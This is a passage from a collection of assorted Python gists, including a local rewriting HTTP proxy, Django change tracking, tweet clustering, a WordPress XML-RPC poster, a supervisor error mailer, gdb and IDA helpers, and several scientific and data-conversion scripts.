try:
proxy.ProxyRequest.process(self)
except KeyError:
print "HTTPS is not supported at the moment!"
class LoggingProxy(proxy.Proxy):
requestFactory = LoggingProxyRequest
class LoggingProxyFactory(http.HTTPFactory):
def buildProtocol(self, addr):
return LoggingProxy()
reactor.listenTCP(8080, LoggingProxyFactory())
reactor.run()
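# Usage note (illustrative, not part of the original gist): point a browser's
# HTTP proxy setting at localhost:8080; plain-HTTP images and HTML passing
# through are then rewritten on the fly (HTTPS is not handled, see above).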
```
#### File: hard-gists/730765/snippet.py
```python
from django.db.models.signals import post_init
def track_data(*fields):
"""
Tracks property changes on a model instance.
The changed list of properties is refreshed on model initialization
and save.
>>> @track_data('name')
>>> class Post(models.Model):
>>> name = models.CharField(...)
>>>
>>> @classmethod
>>> def post_save(cls, sender, instance, created, **kwargs):
>>> if instance.has_changed('name'):
>>> print "Hooray!"
"""
UNSAVED = dict()
def _store(self):
"Updates a local copy of attributes values"
if self.id:
self.__data = dict((f, getattr(self, f)) for f in fields)
else:
self.__data = UNSAVED
def inner(cls):
# contains a local copy of the previous values of attributes
cls.__data = {}
def has_changed(self, field):
"Returns ``True`` if ``field`` has changed since initialization."
if self.__data is UNSAVED:
return False
return self.__data.get(field) != getattr(self, field)
cls.has_changed = has_changed
def old_value(self, field):
"Returns the previous value of ``field``"
return self.__data.get(field)
cls.old_value = old_value
def whats_changed(self):
"Returns a list of changed attributes."
changed = {}
if self.__data is UNSAVED:
return changed
for k, v in self.__data.iteritems():
if v != getattr(self, k):
changed[k] = v
return changed
cls.whats_changed = whats_changed
# Ensure we are updating local attributes on model init
def _post_init(sender, instance, **kwargs):
_store(instance)
post_init.connect(_post_init, sender=cls, weak=False)
# Ensure we are updating local attributes on model save
def save(self, *args, **kwargs):
save._original(self, *args, **kwargs)
_store(self)
save._original = cls.save
cls.save = save
return cls
return inner
```
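A minimal usage sketch for the decorator above, assuming a configured Django project; the `Post` model, its fields, and the signal handler are illustrative only.

```python
# Hypothetical usage of track_data; model fields and handler are illustrative.
from django.db import models
from django.db.models.signals import post_save

@track_data('name', 'body')
class Post(models.Model):
    name = models.CharField(max_length=100)
    body = models.TextField(blank=True)

def on_post_save(sender, instance, created, **kwargs):
    # has_changed / old_value / whats_changed are added by the decorator.
    if instance.has_changed('name'):
        print 'name changed from %r' % instance.old_value('name')
    print 'changed fields: %r' % instance.whats_changed()

post_save.connect(on_post_save, sender=Post)
```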
#### File: hard-gists/736778/snippet.py
```python
import contextlib
import timeit
def work_pass():
pass
def work_fail():
1/0
def simple_catch(fn):
try:
        fn()
except Exception:
pass
@contextlib.contextmanager
def catch_context():
try:
yield
except Exception:
pass
def with_catch(fn):
with catch_context():
fn()
class ManualCatchContext(object):
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
return True
def manual_with_catch(fn):
with ManualCatchContext():
fn()
setup = 'from __main__ import simple_catch, work_pass, work_fail, with_catch, manual_with_catch'
commands = [
'simple_catch(work_pass)',
'simple_catch(work_fail)',
'with_catch(work_pass)',
'with_catch(work_fail)',
'manual_with_catch(work_pass)',
'manual_with_catch(work_fail)',
]
for c in commands:
print c, ': ', timeit.timeit(c, setup)
# simple_catch(work_pass) : 0.190114021301
# simple_catch(work_fail) : 0.190967082977
# with_catch(work_pass) : 5.82143998146
# with_catch(work_fail) : 9.16547012329
# manual_with_catch(work_pass) : 1.06963706017
# manual_with_catch(work_fail) : 1.43239498138
```
#### File: hard-gists/7398239/snippet.py
```python
import csv
import codecs
import numpy as np
import MeCab
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import KMeans, MiniBatchKMeans
from sklearn.decomposition import TruncatedSVD
from sklearn.preprocessing import Normalizer
FILENAME = 'tweets.csv'
NUM_CLUSTERS = 1000
LSA_DIM = 500
MAX_DF = 0.8
MAX_FEATURES = 10000
MINIBATCH = True
def get_tweets_from_csv(filename):
ret = csv.reader(open(filename))
tweets = [r[7].decode('utf-8') for r in ret]
for tweet in tweets[:]:
if u'@' in tweet:
tweets.remove(tweet)
if len(tweet) <= 3:
tweets.remove(tweet)
return tweets
def analyzer(text):
ret = []
tagger = MeCab.Tagger('-Ochasen')
node = tagger.parseToNode(text.encode('utf-8'))
node = node.next
while node.next:
ret.append(node.feature.split(',')[-3].decode('utf-8'))
node = node.next
return ret
def main(filename):
# load tweets
tweets = get_tweets_from_csv(filename)
# feature extraction
vectorizer = TfidfVectorizer(analyzer=analyzer, max_df=MAX_DF)
vectorizer.max_features = MAX_FEATURES
X = vectorizer.fit_transform(tweets)
# dimensionality reduction by LSA
lsa = TruncatedSVD(LSA_DIM)
X = lsa.fit_transform(X)
X = Normalizer(copy=False).fit_transform(X)
# clustering by KMeans
if MINIBATCH:
km = MiniBatchKMeans(n_clusters=NUM_CLUSTERS, init='k-means++', batch_size=1000, n_init=10, max_no_improvement=10, verbose=True)
else:
km = KMeans(n_clusters=NUM_CLUSTERS, init='k-means++', n_init=1, verbose=True)
km.fit(X)
labels = km.labels_
transformed = km.transform(X)
dists = np.zeros(labels.shape)
for i in range(len(labels)):
dists[i] = transformed[i, labels[i]]
# sort by distance
clusters = []
for i in range(NUM_CLUSTERS):
cluster = []
ii = np.where(labels==i)[0]
dd = dists[ii]
di = np.vstack([dd,ii]).transpose().tolist()
di.sort()
for d, j in di:
cluster.append(tweets[int(j)])
clusters.append(cluster)
return clusters
if __name__ == '__main__':
clusters = main(FILENAME)
f = codecs.open('%s.txt' % FILENAME, 'w', 'utf-8')
for i,tweets in enumerate(clusters):
for tweet in tweets:
f.write('%d: %s\n' % (i, tweet.replace('/n', '')))
f.close()
```
#### File: hard-gists/7428185/snippet.py
```python
import urllib
from wordpress_xmlrpc import Client, WordPressPost
from wordpress_xmlrpc.methods import posts
import xmlrpclib
from wordpress_xmlrpc.compat import xmlrpc_client
from wordpress_xmlrpc.methods import media, posts
import os
########################### Read Me First ###############################
'''
------------------------------------------In DETAIL--------------------------------
Description
===========
Add new posts to WordPress remotely using Python using XMLRPC library provided by the WordPress.
Installation Requirement
************************
Verify you meet the following requirements
==========================================
Install Python 2.7 (Don't download 3+, as most libraries don't yet support version 3).
Install from PyPI using easy_install python-wordpress-xmlrpc
Easy_Install Link: https://pypi.python.org/pypi/setuptools
==========================================
Windows Installation Guide
==========================
- Download and install Easy_Install from the link above.
- Extract the downloaded file, open CMD in the extracted directory and run 'python setup.py install'. This installs easy_install.
- Go to %/python27/script and run: easy_install python-wordpress-xmlrpc
Ubuntu Installation Guide
=========================
sudo apt-get install python-setuptools
sudo easy_install python-wordpress-xmlrpc
Note: the script ships with dummy data so it runs out of the box; replace the dummy values or integrate the class with your own code to make it dynamic.
****************************************
For Bugs/Suggestions
<EMAIL>
****************************************
------------------------------------------In DETAIL--------------------------------
'''
class Custom_WP_XMLRPC:
def post_article(self,wpUrl,wpUserName,wpPassword,articleTitle, articleCategories, articleContent, articleTags,PhotoUrl):
self.path=os.getcwd()+"\\00000001.jpg"
self.articlePhotoUrl=PhotoUrl
self.wpUrl=wpUrl
self.wpUserName=wpUserName
self.wpPassword=<PASSWORD>
#Download File
f = open(self.path,'wb')
f.write(urllib.urlopen(self.articlePhotoUrl).read())
f.close()
#Upload to WordPress
client = Client(self.wpUrl,self.wpUserName,self.wpPassword)
filename = self.path
# prepare metadata
data = {'name': 'picture.jpg','type': 'image/jpg',}
# read the binary file and let the XMLRPC library encode it into base64
with open(filename, 'rb') as img:
data['bits'] = xmlrpc_client.Binary(img.read())
response = client.call(media.UploadFile(data))
attachment_id = response['id']
#Post
post = WordPressPost()
post.title = articleTitle
post.content = articleContent
post.terms_names = { 'post_tag': articleTags,'category': articleCategories}
post.post_status = 'publish'
post.thumbnail = attachment_id
post.id = client.call(posts.NewPost(post))
print 'Post Successfully posted. Its Id is: ',post.id
#########################################
# POST & Wp Credentials Detail #
#########################################
#Url of Image on the internet
articlePhotoUrl='http://i1.tribune.com.pk/wp-content/uploads/2013/07/584065-twitter-1375197036-960-640x480.jpg'
# Dont forget the /xmlrpc.php cause thats your posting adress for XML Server
wpUrl='http://YourWebSite.com/xmlrpc.php'
#WordPress Username
wpUserName='WordPressUsername'
#WordPress Password
wpPassword='<PASSWORD>'
#Post Title
articleTitle='Testing Python Script version 3'
#Post Body/Description
articleContent='Final .... Testing Fully Automated'
#list of tags
articleTags=['code','python']
#list of Categories
articleCategories=['language','art']
#########################################
# Creating Class object & calling the xml rpc custom post Function
#########################################
xmlrpc_object = Custom_WP_XMLRPC()
#On Post submission this function will print the post id
xmlrpc_object.post_article(wpUrl,wpUserName,wpPassword,articleTitle, articleCategories, articleContent, articleTags,articlePhotoUrl)
```
#### File: hard-gists/744413/snippet.py
```python
import os
import smtplib
import sys
import time
from optparse import OptionParser
from supervisor import childutils
class ErrorMailer(object):
def __init__(self, address, processes=None):
self.address = address
self.processes = processes
self.stdin = sys.stdin
self.stdout = sys.stdout
self.mailcmd = "mail"
def run(self):
last_email = {}
while True:
headers, payload = childutils.listener.wait(self.stdin, self.stdout)
if headers['eventname'] not in ('PROCESS_STATE_EXITED', 'PROCESS_LOG_STDERR'):
childutils.listener.ok(self.stdout)
continue
if headers['eventname'] == 'PROCESS_STATE_EXITED':
pheaders, pdata = childutils.eventdata(payload+'\n')
if int(pheaders['expected']):
childutils.listener.ok(self.stdout)
continue
msg = ('Process %(processname)s in group %(groupname)s exited '
'unexpectedly (pid %(pid)s) from state %(from_state)s' %
pheaders)
subject = ' %s crashed at %s' % (pheaders['processname'],
childutils.get_asctime())
# self.stderr.write('unexpected exit, mailing\n')
# self.stderr.flush()
self.mail(subject, msg)
childutils.listener.ok(self.stdout)
else: # PROCESS_LOG_STDERR
pheaders, pdata = childutils.eventdata(payload)
name = pheaders['processname']
now = time.time()
if now - last_email.get(name, 0) < 30:
childutils.listener.ok(self.stdout)
continue
last_email[name] = now
subject = ('Process %(processname)s in group %(groupname)s wrote to stderr'
% pheaders)
# self.stderr.write('wrote to stderr, mailing\n')
# self.stderr.flush()
self.mail(subject, pdata.strip())
childutils.listener.ok(self.stdout)
def mail(self, subject, msg):
fromaddress = "root@localhost"
body = "\r\n".join((
"From: %s" % fromaddress,
"To: %s" % self.address,
"Subject: %s" % subject,
"",
msg,
))
server = smtplib.SMTP('localhost')
server.sendmail(fromaddress, [self.address], body)
server.quit()
def build_parser():
parser = OptionParser(usage="Usage: %prog [options]")
parser.add_option("-p", "--process", dest="processes", help="Process name", action="append")
parser.add_option("-m", "--address", dest="address", help="Email address")
return parser
def main():
parser = build_parser()
options, system = parser.parse_args()
if not options.address:
parser.error("must specify an email address")
prog = ErrorMailer(processes=options.processes, address=options.address)
prog.run()
if __name__ == '__main__':
main()
```
#### File: hard-gists/745868fb26102298e837/snippet.py
```python
import ssl
import sys
import optparse
import ConfigParser
import OpenSSL
def getCertificate(s):
cert_pem = ssl.get_server_certificate((s, 443))
cert_der = ssl.PEM_cert_to_DER_cert(cert_pem)
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_pem)
fingerprint = x509.digest('sha1')
fingerprint = ':'.join(fingerprint[pos:pos+2] for pos in xrange(0,len(fingerprint),2))
subject = x509.get_subject()
print '%-25s %s' %('SHA1 Fingerprint:',fingerprint)
print '%-25s %s' %('Serial Number:',x509.get_serial_number())
print '%-25s %s' %('Common Name:',subject.CN)
print '%-25s %s' %('Organization:',subject.O)
print '%-25s %s' %('Issue Date:',x509.get_notBefore())
print '%-25s %s' %('Expiration Date:', x509.get_notAfter())
cert_out = open(s,'wb')
cert_out.write(cert_pem)
cert_out.close()
def readConfigs(args):
usage = "Usage: python %prog [options] "
parser = optparse.OptionParser(usage=usage)
parser.add_option('--server', '-s', action='store', default=None, help='server to enumnerate')
global options
(options,server) = parser.parse_args(args)
def main(args):
readConfigs(args)
if options.server:
getCertificate(options.server)
if __name__ == "__main__":
args = sys.argv[1:]
if args:
main(args)
else:
print "See help (-h) for details"
sys.exit(0)
```
#### File: hard-gists/7466823/snippet.py
```python
import gdb
INDENT = ' '
class SuperTrace(gdb.Command):
old_stack = []
def __init__(self):
super(SuperTrace, self).__init__("supertrace",
gdb.COMMAND_SUPPORT,
gdb.COMPLETE_NONE)
def supertrace(self):
def backtrace_generator():
f = gdb.newest_frame()
while f is not None:
yield f
f = gdb.Frame.older(f)
fstack = []
f = gdb.newest_frame()
for f in backtrace_generator():
frame_name = gdb.Frame.name(f)
if frame_name is None:
continue
#frame_name = '??'
filename = '??'
line = 0
try:
symtab_and_line = gdb.Frame.find_sal(f)
filename = symtab_and_line.symtab.filename
line = symtab_and_line.line
except:
#continue
pass
args = [
frame_name,
filename,
line,
]
fstack.append(args)
fstack.reverse()
ostack = self.__class__.old_stack
is_print = False
for f in enumerate(fstack):
if f[0] >= len(ostack):
is_print = True
else:
if f[1] != ostack[f[0]]:
is_print = True
if is_print:
print('{}| {} at {}:{}'.format(
INDENT * f[0], f[1][0], f[1][1], f[1][2]))
self.__class__.old_stack = fstack
def invoke(self, arg, from_tty):
#num = 0
#try:
# num = int(arg)
#except Exception:
# pass
try:
self.supertrace()
except Exception as e:
print(str(e))
class LastBreakpoints(gdb.Function):
def __init__(self):
super(LastBreakpoints, self).__init__("lastbp")
def invoke(self):
return len(gdb.breakpoints())
class BreakAll(gdb.Command):
def __init__(self):
super(self.__class__, self).__init__("breakall",
gdb.COMMAND_SUPPORT,
gdb.COMPLETE_NONE)
def filelist(self):
files = set()
raw = gdb.execute('info functions', True, True)
lines = raw.split('\n')
for line in enumerate(lines):
if line[1].startswith('File '):
files.add(line[1][5:line[1].find(':')])
#print '{0:3d}: {1}'.format(line[0], line[1])
return files
def invoke(self, arg, from_tty):
for f in self.filelist():
gdb.execute('rbreak {}:.'.format(f))
SuperTrace()
LastBreakpoints()
BreakAll()
```
#### File: hard-gists/749857/snippet.py
```python
from twisted.internet import reactor, stdio, defer
from twisted.internet.protocol import Protocol, Factory
from twisted.protocols.basic import LineReceiver
import time, re, math, json
#<22>Nov 1 00:12:04 gleicon-vm1 postfix/smtpd[4880]: connect from localhost[127.0.0.1]
severity = ['emerg', 'alert', 'crit', 'err', 'warn', 'notice', 'info', 'debug', ]
facility = ['kern', 'user', 'mail', 'daemon', 'auth', 'syslog', 'lpr', 'news',
'uucp', 'cron', 'authpriv', 'ftp', 'ntp', 'audit', 'alert', 'at', 'local0',
'local1', 'local2', 'local3', 'local4', 'local5', 'local6', 'local7',]
fs_match = re.compile("<(.+)>(.*)", re.I)
class SyslogdProtocol(LineReceiver):
delimiter = '\n'
def connectionMade(self):
print 'Connection from %r' % self.transport
def lineReceived(self, line):
k = {}
k['line'] = line.strip()
(fac, sev) = self._calc_lvl(k['line'])
k['host'] = self.transport.getHost().host
k['tstamp'] = time.time()
k['facility'] = fac
k['severity'] = sev
print json.dumps(k)
def _calc_lvl(self, line):
lvl = fs_match.split(line)
if lvl and len(lvl) > 1:
i = int(lvl[1])
fac = int(math.floor(i / 8))
sev = i - (fac * 8)
return (facility[fac], severity[sev])
return (None, None)
class SyslogdFactory(Factory):
protocol = SyslogdProtocol
def main():
factory = SyslogdFactory()
reactor.listenTCP(25000, factory, 10)
reactor.run()
if __name__ == '__main__':
main()
```
#### File: hard-gists/7540117/snippet.py
```python
from pyramid.security import ALL_PERMISSIONS
from pyramid.security import DENY_ALL
from pyramid.security import Allow
from pyramid.security import Everyone
from sqlalchemy import Column, Integer, Text, Unicode
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import scoped_session, sessionmaker, synonym
from zope.sqlalchemy import ZopeTransactionExtension
import cryptacular.bcrypt
ADMINS = []
DBSession = scoped_session(sessionmaker(extension=ZopeTransactionExtension()))
Base = declarative_base()
crypt = cryptacular.bcrypt.BCRYPTPasswordManager()
def hash_password(password):
return unicode(crypt.encode(password))
def groupfinder(userid, request):
"""callback for authentication policy"""
if userid in ADMINS:
return ['g:admins']
else:
return []
class UserFactory(object):
def __init__(self, request):
self.request = request
def __getitem__(self, key):
user = User.get_by_username(key)
user.__parent__ = self
user.__name__ = key
return user
class User(Base):
@property
def __acl__(self):
return [
(Allow, self.email, 'edit'),
(Allow, 'g:admins', ALL_PERMISSIONS),
(Allow, Everyone, 'view'), #DENY_ALL if no public user view
]
__tablename__ = 'users'
user_id = Column(Integer, primary_key=True)
username = Column(Unicode(20), unique=True)
name = Column(Unicode(50))
email = Column(Unicode(50))
hits = Column(Integer, default=0)
misses = Column(Integer, default=0)
delivered_hits = Column(Integer, default=0)
delivered_misses = Column(Integer, default=0)
_password = Column('password', Unicode(60))
def _get_password(self):
return self._password
def _set_password(self, password):
        self._password = hash_password(password)
password = property(_get_password, _set_password)
password = synonym('_password', descriptor=password)
def __init__(self, username, password, name, email):
self.username = username
self.name = name
self.email = email
self.password = password
@classmethod
def get_by_username(cls, username):
return DBSession.query(cls).filter(cls.username == username).first()
@classmethod
def check_password(cls, username, password):
user = cls.get_by_username(username)
if not user:
return False
return crypt.check(user.password, password)
```
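A hedged sketch of how the `groupfinder` callback and `UserFactory` above might be wired into a Pyramid application; the auth secret, route pattern, and settings are illustrative assumptions.

```python
# Hypothetical Pyramid configuration using groupfinder and UserFactory above.
from pyramid.authentication import AuthTktAuthenticationPolicy
from pyramid.authorization import ACLAuthorizationPolicy
from pyramid.config import Configurator

def main(global_config, **settings):
    authn_policy = AuthTktAuthenticationPolicy('seekrit', callback=groupfinder)
    authz_policy = ACLAuthorizationPolicy()
    config = Configurator(settings=settings,
                          authentication_policy=authn_policy,
                          authorization_policy=authz_policy)
    # Traversal under /users/* resolves User objects via UserFactory,
    # so the per-user __acl__ defined on the model applies.
    config.add_route('users', '/users/*traverse', factory=UserFactory)
    config.scan()
    return config.make_wsgi_app()
```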
#### File: hard-gists/756b1d8df2d1487497d29b90e81f8068/snippet.py
```python
import contextlib
import OpenSSL.crypto
import os
import requests
import ssl
import tempfile
@contextlib.contextmanager
def pfx_to_pem(pfx_path, pfx_password):
''' Decrypts the .pfx file to be used with requests. '''
with tempfile.NamedTemporaryFile(suffix='.pem') as t_pem:
f_pem = open(t_pem.name, 'wb')
pfx = open(pfx_path, 'rb').read()
p12 = OpenSSL.crypto.load_pkcs12(pfx, pfx_password)
f_pem.write(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, p12.get_privatekey()))
f_pem.write(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, p12.get_certificate()))
ca = p12.get_ca_certificates()
if ca is not None:
for cert in ca:
f_pem.write(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, cert))
f_pem.close()
yield t_pem.name
# HOW TO USE:
# with pfx_to_pem('foo.pem', 'bar') as cert:
# requests.post(url, cert=cert, data=payload)
```
#### File: hard-gists/7578539/snippet.py
```python
from pylab import *
from numpy import *
from numpy.linalg import solve
from scipy.integrate import odeint
from scipy.stats import norm, uniform, beta
from scipy.special import jacobi
a = 0.0
b = 3.0
theta=1.0
sigma=sqrt(theta/(2*(a+b+2)))
tscale = 0.05
invariant_distribution = poly1d( [-1 for x in range(int(a))], True)*poly1d( [1 for x in range(int(b))], True)
def eigenvalue(n):
return theta*n*(n+a+b+1)/(a+b+2)
gaussian_var = norm()
def dW(dt):
return norm.rvs() / sqrt(dt)
def random_walk(y0, tmax, dt, times = None):
dt = dt * tscale
def rhs(y,t):
return -theta*(y-(a-b)/(a+b+2)) + sqrt(2*theta*(1-y*y)/(a+b+2))*dW(dt/tscale)
if (times is None):
times = arange(0,tmax,dt)
y = zeros(shape=times.shape, dtype=float)
y[0] = y0
for i in range(1,y.shape[0]):
y[i] = y[i-1] + rhs(y[i-1], times[i])*dt
if abs(y[i]) > 1:
y[i] = y[i] / abs(y[i])
return (times, y)
def beta_prior(s, f):
return poly1d(ones(shape=(s,)), True)*poly1d(-1*ones(shape=(f,)), True)
def poly_to_jacobi(x):
"""x is a poly1d object"""
xc = x.coeffs
N = x.order+1
matrix = zeros(shape=(N,N), dtype=float)
for i in range(N):
matrix[N-i-1:N, i] = jacobi(i,a,b).coeffs
return solve(matrix, xc)
def jacobi_to_poly(x):
result = poly1d([0])
for i in range(x.shape[0]):
result = result + (jacobi(i,a,b)*invariant_distribution)*x[i]
return result
def jacobi_to_poly_no_invariant(x):
result = poly1d([0])
for i in range(x.shape[0]):
result = result + jacobi(i,a,b)*x[i]
return result
def propagate_jacobi(pc, t):
"""Takes jacobi coefficients and propagates them"""
n = arange(pc.shape[0], dtype=float)
l = theta*n*(n+a+b+1.0)/(a+b+2.0)*tscale
return exp(-l*t)*pc
def truncate_unnecessary_jacobi(p):
p_normalized = p / (abs(p).sum())
cs = cumsum(abs(p_normalized[::-1]))[::-1]
return p_normalized[where(abs(cs) > 1e-4)]
def pde_solve(prior, t):
result = zeros(shape=(t.shape[0], prior.shape[0]), dtype=float)
result[0,:] = prior
for i in range(1,t.shape[0]):
result[i,:] = propagate_jacobi(result[i-1,:], t[i]-t[i-1])
return result
def transform_to_x(pdf, x):
result = zeros(shape=(pdf.shape[0], x.shape[0]), dtype=float)
for i in range(0, pdf.shape[0]):
p = jacobi_to_poly(pdf[i,:])
result[i,:] = p(x)
result[i,:] /= result[i,:].sum()
return result
tmax = 4
prior = beta_prior(40, 20)
prior_in_jacobi = poly_to_jacobi(prior)
dt = 0.1
times = arange(0,tmax,dt)
x = arange(-1,1,0.01)
rw_dt = 0.01
t, y = random_walk(0.35*2-1, tmax, rw_dt)
solution_as_x = zeros(shape=(times.size, x.size), dtype=float)
solution_as_jacobi = None
empirical_ctr = zeros(shape=(4,), dtype=float)
for i in range(0,4):
nt = int(1.0/dt)
prior = prior_in_jacobi
rnd = uniform(0,1)
if (i > 0):
nsamples = 40
r = rnd.rvs(nsamples)
        ctr = (y[int(i/rw_dt)]+1)/2.0
print "CTR: " + str(ctr)
success = (r < ctr).sum()
print "Empirical: " + str(success / float(nsamples))
evidence = beta_prior( nsamples - success, success)
prior = None
j = truncate_unnecessary_jacobi(solution_as_jacobi[int(1/dt)-1])
prior = poly_to_jacobi(evidence * jacobi_to_poly_no_invariant(j))
empirical_ctr[i] = success / float(nsamples)
solution_as_jacobi = pde_solve(prior, times[i*nt:(i+1)*nt])
solution_as_x[i*nt:(i+1)*nt] = transform_to_x(solution_as_jacobi, x)
plot(arange(0,4), empirical_ctr, 'go')
plot(t, (y+1)/2.0, 'k')
imshow(solution_as_x.transpose(), origin='lower', extent=[0,tmax,0,1])
xlabel("time")
ylabel("CTR")
title("Bayesian Estimate of CTR")
colorbar()
show()
```
#### File: hard-gists/764262/snippet.py
```python
from __future__ import division
from optparse import OptionParser
from itertools import groupby, izip, count, imap, islice
import re, csv
import MOODS
from collections import defaultdict
def isheader(line):
return line.startswith('>')
def PWMIter(handle):
"""Yields name/PWM"""
num_re = re.compile('\d{1,}')
line_gen = imap(lambda x: x.strip(), handle)
name = None
out = None
for header, lines in groupby(line_gen, isheader):
if header:
name = lines.next()[1:]
else:
out = []
for line in lines:
out.append(map(int, num_re.findall(line)))
yield name, out
def transpose(input):
"""transposes a list-of-lists"""
return map(None, *input)
def ParseHeader(header):
"""Parses the structured header to retrieve relevant info"""
parts = header.split('_')
odict = {}
odict['CHROM'] = parts[1]
odict['START'] = int(parts[2])
odict['STRAND'] = parts[4]
return odict
def ProcessSeqs(SEQ_HANDLE, PWMS, THRESHOLD, WANT_REV = False, bg = None):
"""Yields matches on sequences in an 'interval' formatted dictionary"""
pwm_names = map(lambda x: x[0], PWMS)
pwm_mats = map(lambda x: x[1], PWMS)
thresh = map(lambda x:MOODS.threshold_from_p(x, bg, THRESHOLD), pwm_mats)
for interval in ReadInterval(SEQ_HANDLE):
print interval['NAME']
results = MOODS.search(interval['SEQ'].upper(), pwm_mats, thresh,
both_strands = WANT_REV, algorithm = 'lf',
absolute_threshold = True, bg = bg)
for res, pwm_name, pwm_mat, th in zip(results, pwm_names, pwm_mats, thresh):
width = len(pwm_mat[0])
for position, score in res:
if score > th:
yield {
'NAME':interval['NAME'],
'START':int(interval['START'])+position,
'END':int(interval['START'])+width+position,
'STRAND':interval['STRAND'],
'PWM':pwm_name,
'SCORE':score,
'CHROM':interval['CHROM'],
'SEQ':interval['SEQ'][position:(position+width)].upper()
}
else:
print 'got bad result'
def ReadInterval(handle):
"""Reads an Interval file and returns a list of dicts for each row"""
headers = ('CHROM', 'START', 'END', 'NAME', 'junk', 'STRAND',
'junk7', 'junk8', 'junk9', 'junk10', 'junk11',
'junk12', 'SEQ')
for row in csv.DictReader(handle, fieldnames = headers,
delimiter = '\t'):
yield row
def GetBG(handle):
d = defaultdict(int)
for row in islice(ReadInterval(handle), 10):
for r in row['SEQ'].upper():
d[r] += 1
s = sum(d.values())
return [d['A']/s, d['C']/s, d['G']/s, d['T']/s]
if __name__ == '__main__':
parser = OptionParser()
(options, args) = parser.parse_args()
seqintervalfile = args[0]
jasparfile = args[1]
threshold = args[2]
output_file = args[3]
print 'Getting Background'
with open(jasparfile) as handle:
PWMS = list(PWMIter(handle))
with open(seqintervalfile) as handle:
bg = GetBG(handle)
fields = ('CHROM', 'START', 'END', 'STRAND', 'NAME', 'PWM', 'SCORE', 'SEQ')
with open(output_file, 'w') as handle:
handle.write('#'+'\t'.join(fields) + '\n')
with open(seqintervalfile) as f_handle:
writer = csv.DictWriter(handle, fields, )
for row in ProcessSeqs(f_handle, PWMS, float(threshold), bg = bg):
writer.writerow(row)
```
#### File: hard-gists/7653403/snippet.py
```python
u'''Translate YAML written text to graphviz dot language
Input YAML text like below:
---
employee:
- name
- age
- department ->
- manager -> employee
department:
- name
'''
from __future__ import print_function
import re
import yaml
class Item(list):
def __init__(self, name, iterable=[]):
self.name = name
super(Item, self).__init__(iterable)
def __repr__(self):
return '<{0} {1}>'.format(self.name, super(Item, self).__repr__())
def dot(self):
'''return dot language representation of this object
'''
table = [
u'<table bgcolor="#FAFAFA" border="0" cellborder="1"'
u' cellspacing="0" cellpadding="4">',
u'<tr><td align="center" bgcolor="#CCCCEE" port="f0">',
escape(self.name),
u'</td></tr>',
]
arrows = []
for i, v in enumerate(self, 1):
mobj = re.match(r'^(.+)\s*->\s*(.+)?$', v, re.UNICODE)
if mobj:
v, arrow_to = mobj.groups()
if arrow_to is None:
arrow_to = v
v = v.strip()
arrow_to = arrow_to.strip()
arrows.append(u'"{name}":f{i} -> "{arrow_to}" []'.format(
name=escape(self.name), i=i, arrow_to=escape(arrow_to)))
table.extend([
u'<tr><td align="left" balign="left" port="f{}">'.format(i),
br(escape(v)),
u'</td></tr>',
])
table.append(u'</table>')
return u'\n'.join([
u'{} ['.format(escape(self.name)),
u' label = <{}>'.format('\n'.join(table)),
u']',
u'\n'.join(arrows),
])
def quote(s):
if not isinstance(s, basestring):
s = str(s)
return u'"%{}"'.format(s.replace(u'"', u'\\"'))
def escape(s):
if isinstance(s, list):
s = u',\n'.join(s)
elif not isinstance(s, basestring):
s = str(s)
return s.replace(u'&', u'&') \
.replace(u'>', u'>') \
.replace(u'<', u'<')
def br(s):
if not isinstance(s, basestring):
s = str(s)
return s.replace(u'\n', u'<br />')
def yaml_to_dot(yml):
items = [Item(name, contents) for name, contents in yaml.load(yml).items()]
dots = [
u'digraph g {',
u'graph [',
u' rankdir = "LR"',
u']',
u'node [',
# TODO: allow to customize fontsize
u' fontsize = "12"',
u' shape = "plaintext"',
u']',
u'',
]
dots.extend(item.dot() for item in items)
dots.append('}')
return u'\n'.join(dots)
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
input = open(sys.argv[1], 'r')
else:
input = sys.stdin
print(yaml_to_dot(input).encode('utf-8'))
```
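A small driver sketch for the translator above; the module name `yaml2dot` is an assumption about how the snippet is saved, and the sample input is taken from the module docstring.

```python
# Hypothetical driver: feed the docstring's sample YAML to yaml_to_dot.
from yaml2dot import yaml_to_dot  # module name is an assumption

sample = u"""
employee:
  - name
  - age
  - department ->
  - manager -> employee
department:
  - name
"""

dot_source = yaml_to_dot(sample)
print(dot_source.encode('utf-8'))
# Render with Graphviz, e.g.: dot -Tpng out.dot -o out.png
```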
#### File: hard-gists/7671688/snippet.py
```python
import idaapi
import idc
import ctypes
import re
print "Importing CopyEA"
def Paste( data ):
strcpy = ctypes.cdll.msvcrt.strcpy
ocb = ctypes.windll.user32.OpenClipboard #Basic Clipboard functions
ecb = ctypes.windll.user32.EmptyClipboard
gcd = ctypes.windll.user32.GetClipboardData
scd = ctypes.windll.user32.SetClipboardData
ccb = ctypes.windll.user32.CloseClipboard
ga = ctypes.windll.kernel32.GlobalAlloc # Global Memory allocation
gl = ctypes.windll.kernel32.GlobalLock # Global Memory Locking
gul = ctypes.windll.kernel32.GlobalUnlock
GMEM_DDESHARE = 0x2000
ocb(None) # Open Clip, Default task
ecb()
hCd = ga( GMEM_DDESHARE, len(data)+1 )
pchData = gl(hCd)
strcpy(ctypes.c_char_p(pchData),data)
gul(hCd)
scd(1,hCd)
ccb()
def CopyEA():
myModuleName = idc.GetInputFile()
MyModuleShortName = re.sub(r'\.[^.]*$','',myModuleName)
myModuleBase = idaapi.get_imagebase()
myOffset = idc.ScreenEA() - myModuleBase
pasteStr = "bp !%s + 0x%x" % (MyModuleShortName, myOffset)
print pasteStr
Paste(pasteStr)
def start_up():
print "CopyEA Start_up is started..."
COPYHOTKEY = 'z'
print "Press '%s' to copy location of effective address to clipboard()"%COPYHOTKEY
idaapi.CompileLine('static _copy_ea() { RunPythonStatement("CopyEA()"); }')
idaapi.add_hotkey(COPYHOTKEY,CopyEA)
start_up()
```
#### File: hard-gists/76877c8f262de24becc081ad96759730/snippet.py
```python
import requests
import re
import sys
import time
import json
import sqlite3
from websocket import create_connection, WebSocket
colors = [
"#FFFFFF",
"#E4E4E4",
"#888888",
